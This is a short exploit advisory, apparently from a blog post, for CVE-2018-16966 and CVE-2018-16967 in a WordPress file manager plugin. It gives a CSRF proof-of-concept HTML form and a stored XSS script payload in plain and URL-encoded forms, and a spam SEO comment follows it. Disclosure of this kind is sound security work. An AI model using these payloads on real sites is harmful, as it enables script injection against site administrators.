Exploit Author : Mohammed Ansari S ( ansaert@gmail.com )
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: September 11 2018
Affected Version: 3.0
Active installations: 200,000+
1# CSRF and stored XSS - CVE-2018-16966 and CVE-2018-16967
- Create *.html file
<form method="POST" action="http://localhost/wordpress498/wp-admin/admin.php?page=wp_file_manager_root">
<input type="text" name="public_path" value="typepayload"><br />
<input type="text" name="submit" value="Save Changes"><br />
<input type="submit">
</form>
Payload: "><script>alert(1);</script>
public_path=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E
ReplyDeleteHello,
we provide affordable and result-oriented SEO services, please give a chance to serve you.
Thanks
Admin: E07.net